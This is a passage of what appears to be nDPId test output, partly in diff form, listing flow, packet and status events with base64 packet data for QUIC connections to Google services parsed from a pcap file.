{"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1621498081821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498081821,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRtAAH4RYuSfdbB8xkodT+8SAbsFTm91w\/8AAB0ItDBJ3NIuqUkAAEU0OvufirbIDgp026bZbyRK+lP\/li5aeFJuMGsrKstuy5GNC2z4iOO\/abPbTq2u7PrmN1s1F6w0IR63u9BJRRqZsjR9rWd14KbZN92cuC6PwQZASSZ0PWLjMgW8lo8bo\/p4Ie0KGPVmarivxVc7f2b8bWK4ukJRx+v403t\/9CEnqZ+h1nQX3cV0q0wYsDcL4t89rZdkOD\/2h3Tynd0mKl+EfWaCiGCWZTFea00jKZkzOYtci+ntlHZ3vN\/5QVk+nvgSVijNAivrMJEWbvt\/Hgl\/NDn711tOaolOUN7VDWPKhmxO5E+Vj5qkX1JuMR3poM+ZzVmshiDYUYmCOo1\/EPh7BUBA8amQA2Pt5V1UAhZ6l6otPDcgPLAghQgMXkuAiTtWFzpRy1PsfSTGti0hwoBRmXcX4Osy85gPdkMPPjDRL9sxMWZ443WQaNmLu2NCZG76oV8Q9r6elrs8nfp6cokfwyjQiaj5lXdtmWez6Ub9zZ3hVLN4ZSFJ12MzBDXFLF17wXLFQVEwN3J0hUvUhKsfZyTSVGXukr50e1LIUe5Vk3iGcV5os3CuVaG91MxXzApOzbVLLESlpzPGauzkLFu+7wEmphQ8EOGPzSKcgPkIYTuk7\/p1\/qR+e\/LIKLwmFLece51gXCJDFQ9PjUsal8fhmjAQtOvr6WTWXLColGnpvdaMDuQKB8HjmmpR9dJ4DqjExdn9ISewALk8HydNfk8Uvr3B+OVq71nszG8nTFPdSYSBzEWhRglIanWym5rO+STC\/8vTv\/W6q2hhkLWj1q0jtPjwAN\/v2Y+D0A4JyNLo2FkyIJcbWfplQ39A3\/xuxD3YAD12Vn57SeHhSWxO1uApQ+t+zJkEVcrhY9SKtmNwQm+6eVRxYFVqew4rn9K7lyAryiVHDQMrxz5ZBAq541Ty6HHtPWBecGy6gvo\/iT+yBnUFd6REWeOOlZ0VTsR\/AFub95hlY44g8UyeLChHkWygL0G4vYgPCQgWNuZWs1f3PFB3C1r\/neQaHWsEqXfzcFPI1Ve77J+5BsBQx73by2L8lYfyixggOPo7sTcoKYKSodtv9pgExVr24O4\/8tkR+15ZqhYeGxR91PaYugbzj67u+4OLdjdufEwK1FjqMmXfKMkZZSRgMY25aCKP6w9RpGPzU6xtd6n8eBrjegOuQMY2i7GThrYUeYiCj24dBR+A\/nS9Z4ny1MZWcp0jfK4ALWIdHAvCMvFkaEoCrswCG3q2FGMP67Qn27U7Cgdy6Ae8bOKa0gpwD67XIbZ3VnJtIZI7zP+FEhfUi0Yu6AMqmlLsv6OXFjKd16nwj\/J9CUoCsvFZj7Ux\/GRuDCul1XmrxN7CCNOU9OX+ADt2L\/fQyWzOZSvKiBhqpBtkk2TfqvuCvxVhzPhUfxCU++aidWCrZQZzSrwuajKW3QvMvG5Ss7lOXFiKY6un0x+VvjFLGtGPVVsETZAhpkxfy9vVl7cTojfKYb9BYI3it8kRtXGrW\/xIOQ9niF4V1PDpiubAYqMeNRlI3NLhOOvjMSc4gQyVKtScIYXdhvVAZtuM9Yabsw9P+8B5XyWEuXXKfq2yxLzBNvM0uXuRSEoFhzdgUADAIq7QcGiDu8G3IbB0DnhTLfiqNJcrjj5j8Y4Xh8KAEXft93SE+XzT7U\/L3dHtIrBdUdCUjN1yTskCC97fkKUSEv2nRSFu33ULAhr8XAIBTeRzax6cVNbIQtbTQqO2neCBmpL85f0DISj7eIkl89oCYMp+ZXfxIpCUVAU0uyKjoKpFGrNC11tb"} 02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1621498082422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498082422,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRxAAH4RYuOfdbB8xkodT+8SAbsFTriWyf8AAB0ItDBJ3NIuqUkAAEU0gEWSz79hSjx066IgEUilTttXNnBdxCIzGwyKgx22yggjYxUTOdMajr1\/eFj84LW0tWwiYEddNG1hbcYuTsjgufILsroj24Q3t\/uzrvR4hxlGIipIFKFQSdDIGcYBqlNqAaUOXFFDKWM\/NJ506Je2fGuUskxDQKAKr93NLTfrtVPjcaeEjkYt31c\/SZTL75GuaPT2mMN7etsFLArPTUK71+1V1afZAZptJCfmKCNVqwgGuD2i6NTmwkVh1735B38SS9NeTwvibpCCgqWLwGQceudYrYixpQsp4ysYS8hpI\/FAn\/wMbNYfLg0ULXfgBbdtqpqAz8gzjz6eyl\/Rpj5MNvbZVqNxScGru+OBXQwtVEZhxEtA00gRt2yig8vtLXbxeTHNHLvc1tr8ADnBwAus7BUb8Elx\/8QbOQJikFJzSqgm1q4x4Io\/yzHxvAmLnPsiEQqTqREOrKHfmlEHcPkGVkGtxFBNN+2k9aZL5JbmPRlBlC0G63qLufVXOEoqfGJNMZ\/r7nslJeVC3RVHNHRsnQaaVqTKCmjWU\/y1v6+B27XHPLKXFcBZGuXpvfdMRAsvAkwRzf8W8dO1sAukMkeYXN0V0P\/cdEmXv\/Mltpa5lcfPfiRw+bcfRkuNSD7Jc2b+iebax5ug8xwzr02wcXcQF4cGzsQyRZl7DyqI4QU91QrAsEcoHNeRg5JB1T9kQFDdcX\/REgLdvgMgBzxehG7z9OVH69vE5OHzw7pvnkoKe6J1pspEyN\/MZnsAVzaytYx30UuiyRgMISQWN1xfqum7\/YAiZINczHJ8y57E0O2FZW\/YNr4IpADWEzCYwTIu0x3DfRnVNbEZaadYGhViYNEY1zM28\/67i0wKSSLdh+0hygO1BEurBhEzdIroBw1lBfGNyfblV6uG\/7uEn55zpbG\/7qCk0ktkqTFveb6WXCOISST2J32xBVGziVeJsWONMPJ8Jm9PT1AEZcJwaHejFt9DpalZhmwFO8Enc\/ogZQaBxWPbFFyyuh9rvm6tNvA3jaeVh40hlLlIMUxPLddroFwYb\/9EO2mIWdQrHAdGk1Lh6AyJa6YfJKwGpm9NYCxghscJLthycNymVYnlH9ylQDmgmJl7hvnLAvwa32EnPRpWHAkiUhu0kcIqcpT2SkZyiu4cMABsnU3jPWri5+i7YqqcU8clEZP79ilHPctQYpBtvEKAmSD7Gg6PfMEKZqwwpeUK8+dTYIp\/o\/SmoPxYAZFC32OjsVAjSgBTgUFjJQtKJNO\/Q0n0\/Bx7FI53Bh8tOLKaMneKlT+LrkWYQa2IgT0Ubj9l8leMgakA+hFRx5nhKVT+gHy8BijJa8hM45tbFLGLuaHb+CeAqgmE\/m8Ud4ovePpufZDd3bW0o1jrz4rn0BX8tIkQy+IUYoxrBjuExnNvs4TRwyfTblAI\/I31W8aDB662jJlcg\/QE3btTahMgEReMXljoY\/ZRh3u7JIQ6wjk22ntsR1sJRh2WFJh9oJxWsj2DyGf96xBV4z\/aPhEV\/yote5aKxrDNBeQknvp7Yhfy4En1FEvSZe8rUAbBQgDc1BHXrROj+FBZqKGH6sdegaKRirXJnQLUtUJ\/Q5NaDydpZmdgBmsplWOT\/sTyUwVugBQNQqk6\/7I37T4YBTN8nQWspDxdmEOSVvcWwSS7UJNsfcrNGCZpeXaEIJv\/\/lt\/H8+PibZ7H26DpmjUL7J1pXuNg9btTIv8GIPiixqfenNc2qdVBe95VLeHtbRIWFOipebc7xvKSmtYEtFRjvJuANVxLMqf"} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498083623,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498083623,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":141,"packets-processed":140,"total-skipped-flows":0,"total-l4-payload-len":189000,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":95,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":95,"total-idle-flows":94,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":431,"global_ts_msec":1621498212950} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1621498212950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498212950,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDdxAAH4RAMSfdbB8gPgYAcFxAbsFTooVwf8AAB0I+oTf3zKXQjsAAEU0K2X81CUUYVNTb7c\/gt6K92g3k2uie+OA53gIgfaMNjNuH4MUMelKU6Fsw6sNfg5GG5qJ4eud2MFOn8X2tXhI8359esLfPp9WmlTfT\/oOrLme3MuOolugSEKcrrCVkd0LZuV6Av8DKVlHVrlpv0240Nf37vxag6C53FBDIOQ6LCd22JO5xn\/NaFOQBTN5MwhdXKe8H6r+EKu0MMl3i18CTaxer4Ec7N0oGrRomY7+OmgBg9TauzdMWJj0eYJFpdct9mnNghVe3E+WWeOHpf3NCjtkwso9os\/I1QOoZPXB9jwIdZ4Ne8+CuKTG+9tcqCFaaYPOS5DhXjQFlTS5J\/C8wry9mRLfPxmO1BQiHAFr6GP9Y5vWBsO1V2479WWJiBEJug410DZ3eaQ6ykeEHvnIbiMvMtSdXEZttkVySMQ31Fw9rOzeUgG+BPr2jhdWKXNu3NdlWiImj8cTTjQOxOtPhe\/+6Fx3ryMD+9KP13OjJpbH1TmVC3+wAJCtRp7htijDfs+djtrDtQtmYoljdKd6zc7r4DUgUx5a+lfJ+CQXmVSyc22sQwHuhLv4tZCwLDzjsfyd0tH+hoD7Qa72Swsvd9iN8a6VR5VOVL4dEXew+OVA9WCef4VgLk3PIXZKixpDLfYCSJ\/KS3IM1J4\/k8MH5DuYEu14a4bhYLVMzA+\/6Hh+TKT4leprgFJ91woRA3ZcHSFAFDQ6JNfWusZkMrX0kYWHzOn9N74ryBahTJAqZOQDKe7hgPc1zvzFZdQI\/CliH1lyvZkKhGurs+S8SAvkW327v1xIJ3a4v+knVz1HDiu9E8EjgQkT7KRHRIBqqKZ4ondbPabBq7uV6zq471LYqxhGKFGyoGxBVzr2DttB3Z3\/pwDEIs07QNSxcUKBzdZnJ6x2Fq+YkehrvOFCXOy3YCMutFzVwvOnQCidL8ohHIIWEgjIbGLfpHm\/0aWrklIqjrJSJ+rTPRW83W61p44YDEYx\/ac\/msD0XGRhWnBmicJsTwRBBV5svGieLeU0wwoRv\/LHI4mThjAG6AiLpvJ81A8npvcEWQ+MjQOgMjWQq72fQ6mncpsEh8naywuNoXmsIk4BB4ZGwmYN2ud9\/oZeqWqvV2B0k5gYpBOaiO5AHqvzEZdSTEayKAQ1YqXbuCf5QNmeckJiVyF6qNBoatmRZcQSwcZ\/T2ApNAyCKTurIastl6KeRV4+KqYzamhQB2W0\/ku7l9R8YLUGXIpbFAVZ0uF0OZyLqs\/v177JsDndRPefW+Nou62dLsU9VVlluBk+YGFmAONdyhN8iZeA5WCOwz3iTTD5N2bN8mMzQIgg7Bqo\/E8GIRug9o17TbkJUN0YnjfCIbHJtKaMHxL00NJbr3VzPT+M6M9yFXdxFqcigT0A\/lSoDVW1cjJ+LLyxe7NFjRQd0WXacjomlU\/vSqOt4d7QZrZUGLTeRU+r2gGG87IsvBtKso3QQR3flphwZgK4qieVr6KE53k\/ITHpCwbcQAfeWsRIfVZj5YsjA9TaaJLxpay1HiqTxUqZg3plTLPwXIAI2UEnJyFqlp3LNmknoPjV\/RJb\/wzVE1l\/2TAXdCsnVW4\/RvYAIgz1kbEyY+mdBPPmN7r0m+q1IFeOg5RTG+Hz1u5FTDjQLy9DaHat63UbFT45W72CQGLR1YbL59Rzmw7wT02BDrbjYMG5D9ap\/FxMB4LpXzY4OpaSIPgoD0IgD6kheO9CqpcZaNN6hMfIgQu+UTF39\/ec6XrRl9w5Mu88X6Qox2mOpT9nNb4CbMfitF4Z"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1621498213250,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498213250,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd1AAH4RAMOfdbB8gPgYAcFxAbsFTulVxv8AAB0I+oTf3zKXQjsAAEU0+eG2aeYr2ZwxMQeoNxrRVbNbZLWTAPBIHGmzPrHj\/mbYKL9ixyzcBxmQnCXQO1lDY0ds2+Uxd8ptUf0B8IEyK6HWt7XDMsSm0czLAJJ5gHVvFp4WvT2QOxWF9qk9uhVnOEbnpLXsHxpRz\/dz0mNah\/t9a+nz9avu0o52y0QKIy8LvNVm5rColse28vLMEqwFt8Yhb0a+e8F1WQ2Jog1lBFaxZ9C2nVaxdCT6fJgVQ6neO3NzPAYvQeMe31c7fRAOphOfBUEujT4YzhvNiFl\/wwufDbC02lbS32wQDoSwANLD4ijQelHtGYhgR48L98xirGA5IPv0nFtZ1GWdgn333AjOEIFGx3pnnuYgw2iuWo3m3sof14XdX\/TJRFaZuHV1ez9+gI2LSQdjuDaB+lcNc3pexpckY\/HKHazTzKBQe+fUELgAOI36zu7bwfiGs1DcCvWMT+vwQrQ74Yw8jk4Z4SiCS7DRZyln0DpQKDMsVHuAt0JxYrc8EmeYHpAa\/WU7imzzrVyCMqw87RX13BgCI3YyigtKRpDM25QuBSbMZz5ZYeiWXPyE1k+Y7t4UwBli+J1tJgOZYuGdHdpf4dfCgKgBpCB\/sV\/ZjdtG221HiWUjAFU\/RX+F4Sk2nlwgBk3Gu4HyZl\/faOlZ4A1OSdQ+fFuezBbnSGeaqbNo8VqozC+DV5QFVDR+iO+QWF73iaPEDFOX3fumQIGEeMxUCKQDbM3wtercBjGaPrgwSioQrTtGhXuk2URGocylTgSwqUuBqVOiZ6JtnYXVCLz0j3YmG54CGZRJwD6Hdzt9JYrpmq6dmeqLlnGt1boRR50qkJxmjqBOKv7Cl58UXZpi3hAhdW0L1aeY6VfIJ1ywx4a+S3Xag\/orC91PHKrMCiRMP7BHfcAHP3cmMHXdjD7rw9txJdTGOjn8lX\/mclH9lQGLRl1v1dxB91OITgYtiPUptU\/FstAfqQUeN7VbNzZ1K7myM4eKtKPa3VKJ41NTGXaN0jRG3AsJ1FJ1VXwFsxEXvqnYXdbQvqIAtWI7ORnGc4RUiKLZMaiOQ9ZpeJBxqsAYf5Ipe46sFpXilr18+FHg4XkhotA7suHK7WRKyC96nxR2DpEVf2iW1ectFaPFEKsQ\/H1YQbyGSNOyfsPh1j7faS+9snjbmdWCAfHpAxSqQjfbmAdHw\/pXpU8QfMr7cJSolfwHDFsekvEeA7haX+xyxiOvwU0xIpKlGttzlKe9Zs+aw2lgL1+sWhZVxiXxt\/gUA3TRh0SsDzH5g+XZJd\/neVfv5Focg0swaZtgQXQlDD7IMT0JIkbpudBNxUJaoKkGBhyJSXW3YfdpVjMxqZHSyytUW2OsHTqTDxRLDFBCvuJkYPJ\/TXIpK0\/4wD4L9l0omgm3px2fr7Tg0bZjKBZqYFsrt3HkLtSGTbe9Cy8+JivD7AEnEUiKufzcgmavYoKzlmopX0FuwXrvI3Tehohc9Un3CymwmJwzoJogxWbDMhpF+zwoGBGss9an05aUuur3iz7Wxk0lUMrHG4RhjccCzdOjsiU0cpH7WOa3JeWnb8oZZ7E1yUHJnEa8TUN7DI2nHm7hd5xvO0jYRqfo5cwZY5XIuQteKO6d5vyOsi3XP6L\/1\/B2Ut2V2caOd42VO5fK9qvI\/d65vyKDadxtG52mLCNi3gzdraK+EO18KknpwVwSg5Jv0pduYOIgWdKxcr+HnXkkz+KrYNl2w\/cO6BHjE8z+P6ziiwIfrr6GWrGLS2PfoqxdL2ey08WkeqrNpvHrYQU2a4rs"} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1621498213850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498213850,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd5AAH4RAMKfdbB8gPgYAcFxAbsFTsNmzf8AAB0I+oTf3zKXQjsAAEU0TYW2wa0gBSRDkkdmZJDu\/pNSjmjccl+kQig5mlxVsILRFwOMT57XuOv8+xCb+87uWA9dkR3MCory+CSA9k9IwRunZJ+BETH5SfmpqFSP\/EAiXYBfiyWfexJyvvzdDNIlmXLEiyQv4ixIWJIO3WnbJCrbDZ9yN4PPh3+ZJeKdbL3pTJsxyDYJ\/K0AwIB3uSpy2ZQ7iPtPDkHhwAm0FbglERefDANRRCDt9UuWOODuqe\/eXcYzExeuApS5d3YIK4jhh64DClYEzzb+MKIc\/xPP+Kn3lPcPwqqIF0tNqN4kidjRAQThHdN0m2oore8VMpITgbE0pV1MgkL7lfnb1BmHdqPktFFVvg4M9R9oBo\/vgEDDJRAWAmGcmVRa5lB7oAaJdxN824d+GfIw\/1qMVVQy9mbPreGNJI5FA87uOjFOg\/W5J3F1z3HhaIyqbtwEoUGiMpxMkBVwhQJI\/NqiQ7cCTPyStz3iGYjK3gR\/9Bbw8+tTw5id8ub9L1LWEZk7DqKPgXVBJu8OGwqpaRMSGddcTDBphFbTHUszReIPXXK4fIJ8vnhXIbSCNh5usnBJYxXalGGyP1OwD2a79wMSUAPRbTRq3rslV5\/OoRSqu\/Zs+8jHkIPMW4LtxNfcjjkPK2kD4PebKMCHpmd0zooX6LnokRS4M4p0k3XmNrQeH1SNO7ooZjgdGcmI2qpnjZ50wZY0FVF84zFcfhdXiDRTgFPFrSaaxPf0z8xF0n\/P2TpBv6uEkyXD2A5+IeZFJHXEf9qwaBDrm596gwBmYOilpzlnw+vM13lluTV8LOtESGS\/vKE4CpcHhAcjdbP+1ymk+om1iitfEwkvvDF1j1qafTczkx30v4HqUJUwF\/9b61fj4o\/7elbSAAzfCZ7ESTNk2A2MHuqy\/5+jrriuO72nwy6VjhJ+GulTPzobteW+l\/zBEckGEa8FJfTQdOStHqid4SXNF5RJb\/1ytpyxjnE0mVjMP42pjeQQpTUsUPMa9heF32n+XhzIkoHVuTsSW8KUDb8XsSKBKbYY1eJqV22PrlbamGDRPIeYyZxQrvseBe9ZGoW+ojFuhr345lGnNBRTbyV\/ifd+H3psrwilnpBQYZmIt3+yx5+Ox2Fl2MHXrWRMFlVHgyr3YspcY0pZlBmQSZOmPefZHN3UeMEoicflo7w5P9I2OILP+nrgTefS2ax7woPr2siuAHSliWnIFGW80aK6MX04MDmNfZ9qEi9D2uzji0WYs1aM\/FrXpTtqj1SPUWWhLEfXiBcjKNmhsqIUIEkrKDmesaaohHC3lT35CgqVB7Sitf+f3SeyMb+bWGart+IRgLgJBcEhEKoIoYkh0VLJVV9+doaDLpZ3HUz68vvJqjR7RJ0Gd5ED6cjJQuN+n45FpN9LmtbOssh2iF6qqJGi+PGx9q0M1M\/HUKAy5AN1S8YkWFsARDs59lonK62ZegV4vU1TBWQC7PGQRI84JNqfby2iYcagYspBzxJ+WakTI0qksHmy126F0+iqfIjkScGi9KPimhJZju3YFlyo6jNdjnvMmOvUUuhPQiXrORQ0r8qWWWh6tJ9HkW9sI2\/Ef1akHLftAxsOV4Tw7CFHLJLIsPfECdd0l00i7lyYzOrNaZMF3Kzp8XNi91vmLaBsXnvB9zagu0mQRRAnE0+1FdGlzcqDM+y0Fv02XWeM5LLndn5G6Ul+OdbTDl2ol0tkAwTNskAn08T2HhWOi5x48zrrAMi7Lm6AQyQ1v45a0okIW2FPRz\/fVqdN69MfaqHeQccEm1Iu"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":145,"packets-processed":144,"total-skipped-flows":0,"total-l4-payload-len":194400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":96,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":96,"total-idle-flows":94,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":437,"global_ts_msec":1621499083794} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1621499083794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499083794,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijipAAH4RD1eokEAFubq3ucBBAbsFTq7MzP8AAB0IRh+k7PM1K8oANwAxa5vCXNWzfj2PGJr2ZJppn9nfh6Ikx8R\/J2n3pB6hj93tRIJPjf+f1DrhXIYFADw2Oc+Fr21E\/SBJZyXpa0us70tz46tHGmOeBrCokS3GTXPLNs2f7i6PVg5iYBx2tk44g5C8Qs71ezbhVdCLpeHqgEt\/KgFUjX37SuS08dzh1hVBp8Jk3e+0\/4OclX8JP31qwN8hw4wkaeOcFhqGvTvb7GXAVee+0nZmchwlYaeZu2t0+br+FVqhd9lHLvrcyz7DhDlFCTLeKywE2b3EdmYTKWQbL+AaOaELDauoXSTh5q70gLIFBtuSXXAm1sLAL+gBd6WGAsCkwCZK7IBbXbpfWhwnxlVgDIPibi\/nJn1TA586o7oqTn7ceMNjjzs6CB4Mgf4cOzn1YbtrCp\/6c+BO8SdxtB5t2vkCmwP5K7T6LfjBIuFXQ2o66LBu8vSKvZAtVO2yj+LkUyzGXrYGwfv92RyYG7LfM\/qS18M93d\/jLQZxmPy5yiGfWVxPGI0CPYVZsfmSBJekaJCKENQtKqBFs6AVPQwEuwFcacGyY3xE6s1Lu4QTKe\/QxafP6viMrvTQxzW0bcasUyFE1R7C9iQNIeJ9yKNA39s4GHvCsBht5FKpCx9AeuLYalRseEn8YWrDkPowTqNRxe0MscA8q6SQSy6jR0pOiyDsuL3gqILv\/SY8Rac1R05nZiLplGpiGDhE9pweKrCSsLdVSYAwcW3WvtmtNMX4EmbGMMrtnYEWdvuR4n2IdSRyv9gEYX6Q8hzoHG8BLHi+9db7fSutvIgwHCOUrjIPrH1I3iuMdZlcts6TP7n\/rLuIJQ90AfdfuDPtfyv1mHgxzTtaN2PTxwVb6duplHtdy